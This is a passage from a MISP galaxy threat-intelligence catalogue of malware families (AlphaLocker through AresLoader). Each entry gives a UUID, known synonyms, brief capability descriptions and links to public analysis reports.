which can be used as unique global reference for AlphaLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AlphaNC
Internal MISP references
UUID 6e94186c-987e-43da-be2d-9b44f254c8b9
which can be used as unique global reference for AlphaNC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AlphaSeed
Internal MISP references
UUID 966c5a6d-16b8-43b1-acbd-163e904d4a03
which can be used as unique global reference for AlphaSeed
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.alphaseed - webarchive
- https://asec.ahnlab.com/en/60054/ - webarchive
- https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2 - webarchive
- https://medium.com/s2wblog/detailed-analysis-of-alphaseed-a-new-version-of-kimsukys-appleseed-written-in-golang-2c885cce352a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alreay
Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.
It uses either RC4 or DES for encryption of its configuration, which is stored in the registry.
It sends detailed information about the victim's environment, like computer name, Windows version, system locale, and network configuration.
It supports almost 25 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.
It comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).
Alreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.
Internal MISP references
UUID d258de39-e351-47e3-b619-731c87f13d9c
which can be used as unique global reference for Alreay
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alureon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alureon.
Known Synonyms |
---|
Olmarik |
Pihar |
TDL |
TDSS |
wowlik |
Internal MISP references
UUID ad4e6779-59a6-4ad6-98de-6bd871ddb271
which can be used as unique global reference for Alureon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon - webarchive
- http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html - webarchive
- https://twitter.com/Sebdraven/status/1496878431719473155 - webarchive
- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt - webarchive
- https://www.youtube.com/watch?v=FttiysUZmDw - webarchive
- https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf - webarchive
- http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html - webarchive
- http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html - webarchive
- https://securelist.com/tdss/36314/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/ - webarchive
- https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Amadey
Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Internal MISP references
UUID 77f2c81f-be07-475a-8d77-f59b4847f696
which can be used as unique global reference for Amadey
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey - webarchive
- https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_config_extractor.ipynb - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a - webarchive
- https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/ - webarchive
- https://embee-research.ghost.io/amadey-bot-infrastructure/ - webarchive
- https://twitter.com/ViriBack/status/1062405363457118210 - webarchive
- https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/ - webarchive
- https://www.vmray.com/cyber-security-blog/amadey-new-encoding-with-old-tricks/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-amadey-56c8c6ea0ad6 - webarchive
- https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html - webarchive
- https://www.zscaler.com/blogs/security-research/latest-version-amadey-introduces-screen-capturing-and-pushes-remcos-rat - webarchive
- https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/ - webarchive
- https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4 - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://twitter.com/0xffff0800/status/1062948406266642432 - webarchive
- https://embeeresearch.io/redline-stealer-basic-static-analysis-and-c2-extraction/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey - webarchive
- https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey - webarchive
- https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware - webarchive
- https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do - webarchive
- https://asec.ahnlab.com/en/36634/ - webarchive
- https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ - webarchive
- https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Amadey/amadey_string_decryptor.py - webarchive
- https://www.linkedin.com/posts/idan-tarab-7a9057200_apt-ttps-coralraider-activity-7238998746254999553-57LG/ - webarchive
- https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://asec.ahnlab.com/en/41450/ - webarchive
- https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/ - webarchive
- https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/ - webarchive
- https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer - webarchive
- https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://isc.sans.edu/diary/27264 - webarchive
- https://asec.ahnlab.com/en/44504/ - webarchive
- https://asec.ahnlab.com/en/59590/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
- https://nao-sec.org/2019/04/Analyzing-amadey.html - webarchive
- https://www.anquanke.com/post/id/230116 - webarchive
- https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://asec.ahnlab.com/en/40483/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_1_kasuya_en.pdf - webarchive
- https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/ - webarchive
- https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AMTsol
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AMTsol.
Known Synonyms |
---|
Adupihan |
Internal MISP references
UUID ce25929c-0358-477c-a85e-f0bdfcc99a54
which can be used as unique global reference for AMTsol
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol - webarchive
- https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/ - webarchive
- http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anatova Ransomware
Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.
Internal MISP references
UUID 2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4
which can be used as unique global reference for Anatova Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom - webarchive
- https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anchor
Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018, it is not delivered to every infected host but only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in early TrickBot, multiple experts believe it can be attributed to the same authors.
Internal MISP references
UUID c38308a1-c89d-4835-b057-744f66ff7ddc
which can be used as unique global reference for Anchor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ - webarchive
- https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://isc.sans.edu/diary/27308 - webarchive
- https://www.netscout.com/blog/asert/dropping-anchor - webarchive
- https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns - webarchive
- https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf - webarchive
- https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns - webarchive
- https://unit42.paloaltonetworks.com/ryuk-ransomware/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth - webarchive
- https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware - webarchive
- https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607 - webarchive
- https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AnchorMail
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AnchorMail.
Known Synonyms |
---|
ANCHOR.MAIL |
Delegatz |
Internal MISP references
UUID 7792096a-7623-43a1-9a67-28dce0e4b39e
which can be used as unique global reference for AnchorMail
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormail - webarchive
- https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/ - webarchive
- https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/ - webarchive
- https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine - webarchive
- https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AnchorMTea
Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.
Internal MISP references
UUID 565de3f5-7eb7-43ca-a9d9-b588dfd6a50a
which can be used as unique global reference for AnchorMTea
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- http://report.threatbook.cn/LS.pdf - webarchive
- https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Andardoor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Andardoor.
Known Synonyms |
---|
ROCKHATCH |
Internal MISP references
UUID 59a2437b-ae63-466a-9172-60d6610c3e19
which can be used as unique global reference for Andardoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Andromeda
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Andromeda.
Known Synonyms |
---|
B106-Gamarue |
B67-SS-Gamarue |
Gamarue |
b66 |
Internal MISP references
UUID 07f46d21-a5d4-4359-8873-18e30950df1a
which can be used as unique global reference for Andromeda
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda - webarchive
- https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation - webarchive
- http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/ - webarchive
- http://blog.morphisec.com/andromeda-tactics-analyzed - webarchive
- https://blog.avast.com/andromeda-under-the-microscope - webarchive
- https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features - webarchive
- https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis - webarchive
- https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html - webarchive
- https://www.mandiant.com/resources/blog/turla-galaxy-opportunity - webarchive
- http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://redcanary.com/blog/intelligence-insights-november-2021/ - webarchive
- https://eternal-todo.com/blog/andromeda-gamarue-loves-json - webarchive
- http://resources.infosecinstitute.com/andromeda-bot-analysis/ - webarchive
- https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/ - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html - webarchive
- https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
- https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AndroMut
According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1], and “Mut” is based on a mutex that the analyzed sample creates: “mutshellmy777”.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AndroMut.
Known Synonyms |
---|
Gelup |
Internal MISP references
UUID 85673cd4-fb05-4f6d-94ec-71290ae2e422
which can be used as unique global reference for AndroMut
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anel
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anel.
Known Synonyms |
---|
UPPERCUT |
lena |
Internal MISP references
UUID a180afcc-d42d-4600-b70f-af27aaf851b7
which can be used as unique global reference for Anel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anel - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_7_hara_shoji_higashi_vickie-su_nick-dai_en.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/ - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AnteFrigus
Ransomware that demands payment in Bitcoin.
Internal MISP references
UUID 04788457-5b72-4a66-8f2c-73497919ece2
which can be used as unique global reference for AnteFrigus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Antilam
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Antilam.
Known Synonyms |
---|
Latinus |
Internal MISP references
UUID 02be7f3a-f3bf-447b-b8b4-c78432b82694
which can be used as unique global reference for Antilam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anubis (Windows)
According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis (Windows).
Known Synonyms |
---|
Anubis Stealer |
Internal MISP references
UUID b19c9f63-a18d-47bb-a9fe-1f9cea21bac0
which can be used as unique global reference for Anubis (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis - webarchive
- https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/ - webarchive
- https://twitter.com/MsftSecIntel/status/1298752223321546754 - webarchive
- https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/ - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anubis Loader
A loader written in Go, tracked since at least October 2021 by ZeroFox. Originally named Kraken and rebranded to Anubis in February 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis Loader.
Known Synonyms |
---|
Kraken |
Pepega |
Internal MISP references
UUID e65ca164-f448-4f8e-a672-3ff7ec37e191
which can be used as unique global reference for Anubis Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis_loader - webarchive
- https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/ - webarchive
- https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/ - webarchive
- https://windowsreport.com/kraken-botnet/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/ - webarchive
- https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
APERETIF
Internal MISP references
UUID 573eb306-f6c7-4ba9-91a9-881473d335b8
which can be used as unique global reference for APERETIF
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Apocalipto
Internal MISP references
UUID d3e16d46-e436-4757-b962-6fd393056415
which can be used as unique global reference for Apocalipto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Apocalypse
Internal MISP references
UUID e87d9df4-b464-4458-ae1f-31cea40d5f96
which can be used as unique global reference for Apocalypse
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Apollo
This is an implant usable with the Mythic C2 framework. Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.
Internal MISP references
UUID f995662c-27ad-440b-97ce-f1ecd2b59221
which can be used as unique global reference for Apollo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Apostle
Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.
Internal MISP references
UUID cb2d3a6f-8ff5-4b08-af95-7377cfe3f7c3
which can be used as unique global reference for Apostle
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/ - webarchive
- https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf - webarchive
- https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/ - webarchive
- https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/ - webarchive
- https://assets.sentinelone.com/sentinellabs/evol-agrius - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AppleJeus (Windows)
Internal MISP references
UUID 2b655949-8a17-46e5-9522-519c6d77c45f
which can be used as unique global reference for AppleJeus (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d - webarchive
- https://www.telsy.com/download/5394/?uid=28b0a4577e - webarchive
- https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-048a - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://twitter.com/VK_Intel/status/1182730637016481793 - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Appleseed
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Appleseed.
Known Synonyms |
---|
JamBog |
Internal MISP references
UUID c7f8e3b8-328d-43c3-9235-9a2f704389b4
which can be used as unique global reference for Appleseed
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed - webarchive
- https://asec.ahnlab.com/en/30532/ - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf - webarchive
- https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf - webarchive
- https://asec.ahnlab.com/ko/26705/ - webarchive
- https://asec.ahnlab.com/en/36368/ - webarchive
- https://www.youtube.com/watch?v=Dv2_DK3tRgI - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/ - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf - webarchive
- https://asec.ahnlab.com/ko/36918/ - webarchive
- https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf - webarchive
- https://asec.ahnlab.com/en/59590/ - webarchive
- https://asec.ahnlab.com/en/41015/ - webarchive
- https://www.youtube.com/watch?v=rfzmHjZX70s - webarchive
- https://www.telsy.com/download/5654/?uid=4869868efd - webarchive
- https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2 - webarchive
- https://asec.ahnlab.com/ko/54804/ - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf - webarchive
- https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/ - webarchive
- https://asec.ahnlab.com/en/60054/ - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ArdaMax
According to f-secure, Ardamax is a commercial keylogger program that can be installed onto the system from the product's website. When run, the program can capture a range of user activities, such as keystrokes typed, instant messenger chat logs, web browser activity and even screenshots of the active desktop.
This program can be configured to a complete stealth mode, with password protection, to avoid user detection.
The information gathered is stored in an encrypted log file, which is only viewable using the built-in Log Viewer. The log file can be sent to an external party through e-mail, via a local area network (LAN) or by upload to an FTP server (in either HTML or encrypted format).
Internal MISP references
UUID 4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5
which can be used as unique global reference for ArdaMax
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Arefty
Internal MISP references
UUID bf135b0a-3120-42c4-ba58-c80f9ef689bf
which can be used as unique global reference for Arefty
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ares (Windows)
A banking trojan, derived from the source code of win.kronos. In August 2022 it started to incorporate DGA code from win.qakbot.
Internal MISP references
UUID a711ad02-0120-41a1-8c03-8a857a7dc297
which can be used as unique global reference for Ares (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AresLoader
